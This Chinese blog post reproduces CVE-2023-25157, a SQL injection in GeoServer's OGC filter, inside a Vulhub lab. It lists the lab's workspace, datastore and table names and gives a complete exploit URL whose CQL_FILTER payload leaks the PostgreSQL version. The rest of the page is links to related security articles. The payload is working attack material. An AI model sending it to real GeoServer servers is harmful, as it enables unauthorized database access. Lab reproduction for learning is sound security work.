程序员经验分享-hwhale

【漏洞复现】CVE-2023-25157 GeoServer OGC Filter SQL注入漏洞

2023-11-12

启动环境

 查看端口号

 访问http://your-ip:8080/geoserver即可查看到GeoServer的首页。

在利用漏洞前,需要目标服务器中存在类型是PostGIS的数据空间(datastore)和工作空间(workspace)。在Vulhub中,已经包含满足条件的工作空间,其信息如下:

  • Workspace name: vulhub
  • Data store name: pg
  • Feature type (table) name: example
  • One of attribute from feature type: name

利用这些已知参数,发送如下URL即可触发SQL注入漏洞:

http://your-ip:8080/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith%28name%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+integer%29%29+--+%27%29+%3D+true

 使用SQL注入获取到了目标服务器PostgreSQL的版本

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

vulhub漏洞复现

安全

web安全

【漏洞复现】CVE-2023-25157 GeoServer OGC Filter SQL注入漏洞 的相关文章

  • 为什么这么多人自学黑客,但没过多久就放弃了(掌握正确的网络安全学习路线很重要)

    网络安全是一个 不断发展和演变 的领域 以下是一个 网络安全学习路线规划 旨在帮助初学者快速入门和提高自己的技能 基础知识 网络安全的 基础知识 包括 网络结构 操作系统 编程语言 等方面的知识 学习这些基础知识对理解网络安全的原理和技术至

  • 网络安全从入门到精通(超详细)学习路线

    首先看一下学网络安全有什么好处 1 可以学习计算机方面的知识 在正式学习网络安全之前是一定要学习计算机基础知识的 只要把网络安全认真的学透了 那么计算机基础知识是没有任何问题的 操作系统 网络架构 网站容器 数据库 前端后端等等 可以说不想

  • 通过一个寒假能学会黑客技术吗?看完你就知道了

    一个寒假能成为黑客吗 资深白帽子来告诉你 如果你想的是学完去美国五角大楼内网随意溜达几圈 想顺走一点机密文件的话 劝你还是趁早放弃 但是成为一名初级黑客还是绰绰有余的 你只需要掌握好渗透测试 Web安全 数据库 搞懂web安全防护 SQL注

  • 适用于任何公司的网络安全架构

    1 第一等级 基础级 优势 可防范基本有针对性的攻击 使攻击者难以在网络上推进 将生产环境与企业环境进行基本隔离 劣势 默认的企业网络应被视为潜在受损 普通员工的工作站以及管理员的工作站可能受到潜在威胁 因为它们在生产网络中具有基本和管理员

  • 网络空间安全女生就业,怎么学?

    我实验室的学长们基本都是以红队和复现为主 如果学校好点可能还有更多的选择 如果想在这个方向深入下去 推荐流程是先打两年CTF 把大概的技术方向摸一摸 大一的话 如果学校还不错 那就优先建议打好基础 包括C语言 Python一类 建议把CTF

  • The Planets:Venus

    靶场下载 The Planets Venus VulnHub 信息收集 arp scan l Interface eth0 type EN10MB MAC 00 0c 29 43 7c b1 IPv4 192 168 1 60 Starti

  • 【网络安全】Web缓存欺骗攻击原理及攻防实战

    Web缓存欺骗是一种新的攻击方式 危害范围可扩大至各种技术及框架 本文仅分享Web缓存攻击知识 不承担任何由于传播 利用本文所发布内容而造成的任何后果及法律责任 文章目录 前言 攻击前提及原理 实例一 ChatGPT帐户接管漏洞 实例二 P

  • 信号浪涌保护器的原理和行业应用方案

    信号浪涌保护器 Surge Protective Device 简称SPD 是一种用于限制信号线路中瞬态过电压和分泄浪涌电流的防雷装置 主要用于保护各类信号线路及设备的防雷安全 信号浪涌保护器的原理是利用气体放电管 压敏电阻 齐纳二极管等非

  • SRC漏洞挖掘经验+技巧篇

    一 漏洞挖掘的前期 信息收集 虽然是前期 但是却是我认为最重要的一部分 很多人挖洞的时候说不知道如何入手 其实挖洞就是信息收集 常规owasp top 10 逻辑漏洞 重要的可能就是思路猥琐一点 这些漏洞的测试方法本身不是特别复杂 一般混迹

  • 线程安全(中)--彻底搞懂synchronized(从偏向锁到重量级锁)

    接触过线程安全的同学想必都使用过synchronized这个关键字 在java同步代码快中 synchronized的使用方式无非有两个 通过对一个对象进行加锁来实现同步 如下面代码 synchronized lockObject 代码 对

  • 用户数据中的幸存者偏差

    幸存者偏差 Survivorship bias 是一种常见的逻辑谬误 意思是没有考虑到筛选的过程 忽略了被筛选掉的关键信息 只看到经过筛选后而产生的结果 先讲个故事 二战时 无奈德国空防强大 盟军战机损毁严重 于是军方便找来科学家统计飞机受

  • 200道网络安全常见面试题合集(附答案解析+配套资料)

    有不少小伙伴面临跳槽或者找工作 本文总结了常见的安全岗位面试题 方便各位复习 祝各位事业顺利 财运亨通 在网络安全的道路上越走越远 所有的资料都整理成了PDF 面试题和答案将会持续更新 因为无论如何也不可能覆盖所有的面试题 php爆绝对路径

  • 远程控制软件安全吗?一文看懂ToDesk、RayLink、TeamViewer、Splashtop相关安全机制_raylink todesk

    目录 一 前言 二 远程控制中的安全威胁 三 国内外远控软件安全机制 ToDesk RayLink Teamviewer Splashtop 四 安全远控预防 一 前言 近期 远程控制话题再一次引起关注 据相关新闻报道 不少不法分子利用远程

  • 小白入门黑客之渗透测试(超详细)基本流程(内附工具)

    经常会收到小伙伴们这样的私信 为什么我总是挖不到漏洞呢 渗透到底是什么样的流程呢 所以全网最详细的渗透测试流程来了 渗透测试其实就是通过一些手段来找到网站 APP 网络服务 软件 服务器等网络设备和应用的漏洞 告诉管理员有哪些漏洞 怎么填补

  • 渗透测试常用工具汇总_渗透测试实战

    1 Wireshark Wireshark 前称Ethereal 是一个网络分包分析软件 是世界上使用最多的网络协议分析器 Wireshark 兼容所有主要的操作系统 如 Windows Linux macOS 和 Solaris kali

  • 数据加密保障数据安全

    一 目标 1 1 预研需求 数据加密是安全领域中常用的安全措施 它们的主要作用是保护数据的机密性和完整性 以防止未经授权的访问 窃取 篡改或泄漏敏感信息 数据传输加密 保护敏感数据在传输过程中的安全 当数据通过网络传输时 它们可能会经过多个

  • 【无标题】

    大家都知道该赛项的规程和样题向来都是模棱两可 从来不说具体的内容 导致选手在备赛时没有头绪 不知道该怎么训练 到了赛时发现题目和备赛的时候完全不一样 那么本文将以往年信息安全管理与评估赛项经验来解读今年2023年国赛的规程 帮助选手们指明方

  • 【方法】如何把Excel“只读方式”变成可直接编辑?

    Excel在 只读方式 下 编辑后是无法直接保存原文件的 那如何可以直接编辑原文件呢 下面来一起看看看吧 如果Excel设置的是无密码的 只读方式 那在打开Excel后 会出现对话框 提示 是否以只读方式打开 如果想直接编辑文件 选择 否

  • 【安全-SSH】SSH安全设置

    今天发现自己的公有云服务器被攻击了 在这里插入图片描述 https img blog csdnimg cn direct cafdca04646f4b8b838400ec79ac282f png 然后查看了登录日志 如上图 ls sh va

  • 【安全】网络安全态势感知

    文章目录 一 态势感知简介 1 概念 2 形象举例 3 应具备的能力 二 为什么要态势感知 为什么网络安全态势感知很重要 三 态势感知系统的功能 四 如何评估态势感知的建设结果 五 什么是态势感知的三个层级 四 业界的态势感知产品 1 安全

随机推荐

  • 交通指南系统

    一 实验目的 1 掌握图的基本存储方法 2 掌握有关图的操作算法并用高级语言实现 3 熟练掌握图的两种搜索路径的遍历方法 二 实验内容 假设以一个带权有向图表示某一区域的公交线路网 图中顶点代表一些区域中的重要场所 弧代表已有的公交线路 弧

  • 【经验】工业以太网PROFINET从机(TPS-1)与主机(MCU)通讯初始化时序控制注意事项

    目录 一 TPS 1的复位引脚和主机MCU的复位引脚应连接到系统复位 二 应首先启动从设备 然后启动主机MCU 瑞萨电子TPS 1是支持PROFINET协议的单芯片接口元件 它集成了PROFINET CPU PROFINET协议栈 2通道以

  • C/C++基于线程的并发编程(二):线程安全和线程锁

    线程安全 所谓线程安全不是指线程的安全 而是指内存的安全 线程是由进程所承载 所有线程均可访问进程的上下文 意味着所有线程均可访问在进程中的内存空间 这也是线程之间造成问题的潜在原因 当多个线程读取同一片内存空间 变量 对象等 时 不会引起

  • Java基础——数组应用之字符串String类

    字符串String的使用 Java字符串就是Unicode字符序列 例如串 Java 就是4个Unicode字符J a v a组成的 Java中没有内置的字符串类型 而是在标准Java类库中提供了一个预定义的类String 每个用双引号括起

  • 【PYTHON并发学习】多线程Threading+多进程Multiprocessing+多协程Asyncio

    文章目录 PYTHON并发知识学习 第一节 python并发编程简介 第二节 怎样选择多线程多进程多协程 第三节 python速度慢的罪魁祸首 全局解释器GIL 第四节 使用多线程 python爬虫被加速10倍 第五节 python实现生产

  • VS调试时如何跳出for循环?

    例如这个程序 如果我单步调试时进入了第116行的for循环那么不论我们是 逐语句 F10还是 逐过程 F11还是 跳出 shift F11 都无法做到让for循环一次性执行完 解决办法 在for循环外设置断点 如 行125 gt F8跳到下

  • c/c++依赖静态库、动态库符号问题

    假设 某可执行程序exe依赖liba中的funcA和libb中的funcB liba和libb中定义了同名的函数subfunc 供funcA和funcB调用 两个库中的subfunc实现不同 一个是相加 一个是相减 liba so liba

  • Flask-响应

    响应字符串 Flask调用视图函数后 会将其返回值作为响应的内容 多数情况下 响应就是一个简单的字符串 作为html页面回送客户端 如 app route admin def hello admin return Hello Admin f

  • [系统安全] 三十.CS逆向分析 (1)你的游戏子弹用完了吗?Cheat Engine工具入门普及

    您可能之前看到过我写的类似文章 为什么还要重复撰写呢 只是想更好地帮助初学者了解病毒逆向分析和系统安全 更加成体系且不破坏之前的系列 因此 我重新开设了这个专栏 准备系统整理和深入学习系统安全 逆向分析和恶意代码检测 系统安全 系列文章会更

  • jboss jndi配置部分参数详解

    使用的是jboss7 1 1 jndi的配置在 JBOSS HOME standalone configuration standalone xml中进行配置 配置jndi时有很多参数 解释下用到的一些参数 jndi name The JN

  • k8s笔记14--初次体验 开源云原生软件交付平台zadig

    k8s笔记14 初次体验 开源云原生软件交付平台zadig 1 介绍 2 部署 测试 2 1 部署 2 2 测试 3 注意事项 4 说明 1 介绍 Zadig 是 KodeRover 公司基于 Kubernetes 自主设计 研发的开源分布

  • 杰理之PC端拷贝语音文件到外挂flash速度慢如何解决【篇】

    开启了flash拷贝缓冲buffer

  • 面向对象程序设计 第一次作业 记录

    Date类的定义及使用 题目描述 定义一个Date类 该类有year month和day三个私有成员 用于存储日期的年 月和日信息 为该类定义默认构造函数 带参的构造函数 复制构造函数和读写数据成员的函数setDate和showDate 其

  • macOS 13 Ventura系统自动开机在哪设置?

    macOS 13如何设置自动开关机 Mac电脑可以设置一个自动开机时间来让电脑自动启动 Mac设置自动开关机的方法教程 macOS13系统正式版已经发布了一段时间 不知道大家有没有升级到macOS 13 Ventura最新系统呢 在 mac

  • GitBook, Git + Markdown 快速发布你的书籍

    本文转载至 http leeluolee github io 2014 07 22 2014 07 22 gitbook guide gitbook是一个用于发布个人书籍的平台 类似于国外著名的LeanPub 其中一个很大的特点是它利用gi

  • Mac OS X 打开自动播放

    本文转载至 http www defaults write com quicktime player x enable auto play feature Quicktime Player X 默认情况下是不会自动播放了 可以通过下面的命令

  • 刘二PyTorch深度学习(五)——Logistic Regression

    1 分类问题的输出其实是一个概率 2 二分类 只有两个分类的问题 0和1 3 饱和函数 导函数图像类似于正态分布 x越接近0 图像斜率越大 离0越远 斜率越小 当超过某一阈值时 导数值越来越小 最后趋近于0 4 Logistic函数 西格玛

  • nodejs中间件

    内置中间件 express中内置的中间件 中间件本质是一个函数 json json是处理json请求的 获取参数 req body app use express json 测试json是否成功的步骤 1 在postman发起请求 2 po

  • 智能运维发展史及核心技术研究

    作者介绍陈林博 工学博士 毕业于同济大学计算机系统结构专业 目前从事基础技术框架研发 云计算研究与应用 智能运维研究与应用等工作 何支军 工程硕士 毕业于复旦大学微电子专业 现任中国结算上海分公司技术开发部总监 长期从事登记结算技术系统的建

  • 【漏洞复现】CVE-2023-25157 GeoServer OGC Filter SQL注入漏洞

    启动环境 查看端口号 访问http your ip 8080 geoserver即可查看到GeoServer的首页 在利用漏洞前 需要目标服务器中存在类型是PostGIS的数据空间 datastore 和工作空间 workspace 在Vu

热门标签